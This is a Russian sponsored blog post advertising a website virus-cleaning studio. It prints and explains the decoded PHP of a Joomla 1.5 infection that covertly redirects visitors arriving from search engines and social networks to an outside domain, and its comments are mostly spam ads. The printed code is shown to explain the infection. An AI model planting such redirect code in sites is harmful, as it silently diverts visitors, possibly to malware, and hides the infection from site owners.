Чистка сайтов от вирусов.

Заманчивое предложение от спонсоров:

Стоимость удаления вирусов с одного сайта в студии Millor составит от 2000 рублей до 3500 рублей за комплекс работ по устранению вирусных скриптов. Срок исполнения — один рабочий день. Цены и сроки зависят от количества зараженных файлов и их типа.

Для заказа услуги чистки сайта от вирусов, позвоните по телефонам (499) 755-90-52. Так же вы можете отправить заявку по почте millor.ru(@)gmail.com 
(уберите скобки).
Чистка сайта от вирусов — дело не из простых. И, зачастую, самостоятельное удаление вирусов с сайта непрофессионалом может привести либо к неработоспособности некоторых компонентов, либо к неполной очистке сайта, что приведет к продолжению распространения вирусов на сайте. Поэтому я настоятельно рекомендую всем тем, кто не имеет опыта удаления вируса с сайта обратиться к спонсору блога — студии Millor. Специалисты студии быстро и недорого произведут полную очистку сайта от вирусов, ничего не сломают и дадут рекомендации как избежать подобных ситуаций в дальнейшем.

Итак, что же плохого и опасного может быть в вирусе? Разберем популярный на сегодняшний день вирус, который легко и быстро заражает сайты на Joomla 1.5. В файловой системе он, нак и подавляющее большинство закодирован, имеет особенность заражать не только индексные файлы, но и другие, которые исполняются. Например, файлы Виртуемарта.

В расшифрованном виде он выглядит примерно так:

 Код вируса

Посмотреть код
  1. error_reporting(0); 
  2. $qazplm=headers_sent(); 
  3. if (!$qazplm){ 
  4. $referer=$_SERVER['HTTP_REFERER']; 
  5. $uag=$_SERVER['HTTP_USER_AGENT']; 
  6. if ($uag) { 
  7. if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { 
  8. if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ 
  9. header("Location: http://costabrava.bee.pl/"); 
  10. exit(); 
  11. } 
  12. } 
  13. }

Если вы не имеете достаточных знаний в php, чтобы расшифровать приведенный выше код, объясню.

Вирус определяет тип клиента, и в том случае, если это браузер (таким образом он понимает, что на сайт попал живой человек, а не бот), ставит хитрое условие: если человек попадает на сайт  из поисковой системы, либо кликнув на контекстную ссылку в Яндекс-директе или Гугл-адсенсе, если он попадает на сайт, перейдя по ссылке из социальных сетей, либо сервисов коротких url и так далее, то сайт редиректится на (в данном случае) http://costabrava.bee.pl/.

В том случае, если человек пришел на сайт набрав его URL в адресной строке браузера или нажал на ссылку с любого другого сайта (например, с моего), то скрипт не срабатывает и человек видит целевую страницу. То есть, как видите, сделано все, чтобы хозяин или админ сайта максимально долго не мог заметить что сайт заражен вирусом (не будет же он сам щелкать по своей ссылке в директе). 

Для чего это сделано? Как вариант — черная раскрутка какого-нибудь бренда. Например, создается временный сайт в сервисе бесплатного хостинга www.bee.pl с запоминающимся логотипом, заражается миллион сайтов. Люди видят этот логотип. А потом просто увидев логотип на улице, они думают, что это раскрученная торговая марка, которой можно и довериться. 

Еще один вариант — редирект на страницу с трояном, который заразит ваш windows-компьютер. Троян же может легко и быстро украсть все пароли, которые есть у вас на компьютере, все адреса почты. Все, вы в базе. Не успеете вы почистить компьютер от вирусов, как все ваши пароли и адреса из почтового клиента будут находиться в руках у хакеров. Потом не спрашивайте как могли взломать вашу страницу в Одноклассниках, если у вас мега-пароль из 20 букв перемешанных с цифрами.

Итак, зачем нужны вредоносные коды на сайтах мы разобрались. Как же убрать вирус с сайта? Вариантов масса, один из них я описал в самом начале поста. Остальное будем считать коммерческой тайной моих спонсоров. В конце концов, 2000 рублей для коммерческой организации — это не деньги. Если не убрать вирус с сайта, вы можете потерять гораздо больше.

Как обезопасить себя от заражения сайта вирусами в дальнейшем? Ответ прост: регулярно обновляйте свои CMS. Например, вирус, который был описан выше легко пробивает защиту Joomla 1.5.25 и не может заразить Joomla 2.5.3. Не используйте операционную систему Windows, поскольку она наиболее слаба в плане заражения вирусами. Используйте Mac OS X, а если нет денег, то переходите на бесплатные Linux, Ubuntu, FreeBSD... Словом, те операционки, которые изначально защищены от вирусни.

Да, обновление системы управления сайтом и операционной системы — это сложно. Да, много компонентов для 2.5 еще не придумано. Зато придуманы вирусы под  Joomla 1.5.25, а версии Joomla 1.5.26, по словам разработчиков не будет; придуманы вирусы для Windows и эта проблема не решится, по-моему, никогда. В конце концов, компоненты, если они очень важны, можно разработать самостоятельно или заказать их разработку в IT-компании.

Помимо обновления CMS, я бы еще посоветовал установить компонент Eyesite, который отслеживает изменения в файлах и предупреждает о таковых по почте. На этом все. Надеюсь, эта статья принесла вам, моим читателям, столько же пользы, сколько и моим спонсорам.

Не забываем:

Для заказа услуги чистки сайта от вирусов, позвоните по телефонам (495) 410-98-08 или (499) 755-90-52. Так же вы можете отправить заявку по почте millor.ru(@)gmail.com (уберите скобки). 

Твитнуть

Комментарии   

 
Gabriele
0 #13 Gabriele 12.01.2015 07:49
CNN warns that when you borrow just one or two hundred dollars to
have an auto title loans online: http://atlastalk.com/site/?q=node/594 loan and default, you
may still have your automobile repossessed and never see any return to the profit that the financial
institution made gets hotter sold your car or truck.
Цитировать
 
 
Kyrsorf
-1 #12 Kyrsorf 01.10.2013 17:07
http://xxxxxx.ru/ предлагает комплекс услуг по лечению и защите сайта. Мы профессионалы и в своей работе используем полный набор новейшего программного обеспечения по аудиту сайтов, комплексной защите и борьбе с вирусами.
+7(xxxx)xx-xx-xx / Skype: XXXXxx / E-mail :
Цитировать
 
 
Данил
-1 #11 Данил 20.09.2013 14:31
Помогу с чисткой. Качественно + 100% гарантия.

Отзывы - xxxxx-xxxx.ru
skype:xxxxx-xxxx
email:
Цитировать
 
 
Иван111
+2 #10 Иван111 11.05.2013 18:32
Профессионально удалим вирусы с вашего сайта, огромный опыт работы! Наш сайт - xxxxxxxxx.xx
Цитировать
 
 
Зайка
0 #9 Зайка 08.03.2013 03:09
Спасибо, статья замечательная и правильно, что не рассказано нюансов, понабежали тут нюансов им. Я тоже веб-мастер, чуть ниже вас стою. С удовольствие попробую описанную Eyesite :)
Цитировать
 
 
Артем
+5 #8 Артем 15.02.2013 14:59
Дорогой Статья говно!
Это не просто заточенная по коммерческие запросы статья. Эта страница в принципе сделана для рекламы услуг!
Цитировать
 
 
Статья говно!
+1 #7 Статья говно! 14.02.2013 22:39
Статья говно! Заточена бод коммерческий запрос, /* вырезан текст направленный на снижение позиций */
Цитировать
 
 
Артем
0 #6 Артем 29.01.2013 01:08
Товарищи, читайте правила комментирования . Я не оставляю коммерческую рекламу в комментариях. А если вам нужны деньги — отправляйте резюме и портфолио на почту, указанную в статье. И если вы действительно профессионал, у вас будет шанс получить работу в международной студии.
Цитировать
 
 
Данил
-4 #5 Данил 21.01.2013 02:25
Ребята, кому нужна чистка, обращайтесь!
xxxxx-xxxx.xx
skype: xxxxx-xxxx
Цитировать
 
 
Артем
+8 #4 Артем 14.05.2012 15:05
Алексей, не говорите ерунду — это раз. Не завышайте цены, поскольку далеко на этом не уедете — это два. Не пишите спам в моем блоге — это три.
Цитировать
 
 
XXX X Studio
-11 #3 XXX X Studio 12.05.2012 17:04
Чистим сайт от вирусов! без повреждений самих файлов и функционала !

цена 2 000 рублей. Это дороже чем написано в статье, за то четко ! В конце концов профессионалы, как написано в статье, за 1000 рублей не возьмутся, знаю по себе.
звоните. 8 952 xxx xx xx Алексей
Цитировать
 
 
Артем
+7 #2 Артем 23.03.2012 16:14
Григорий Викторович, вы шутник!
Во-первых, внимательнее читайте пост.
Во-вторых, генеральный директор Лукойла, к примеру, очень даже умный человек, но он вряд ли знает как удалить вирусы с сайта.

Да, чуть не забыл. Если у вас чистка сайта от вирусов занимает 2—3 дня, это вовсе не значит, что команда профессионалов не сможет это сделать за 2—3 часа.
Цитировать
 
 
лепс
-7 #1 лепс 23.03.2012 15:48
аффтар продался. только дебил не знает как сайт от вирусофф почистить. и за один день это не делаетцо. минимум два-три дня...
Цитировать
 

Добавить комментарий

Защитный код
Обновить

joomla 1.7

Не получаются доработки?

Становитесь партнером студии Millor! Быстро и недорого эти ребята помогут решить практически любую проблему.

Хотите подзаработать?

Если да, то вам сюда! Партнерская программа студии MyWebSite. Получи 20% за каждого клиента! Работаем по всей России и СНГ!

Рекламное место свободно.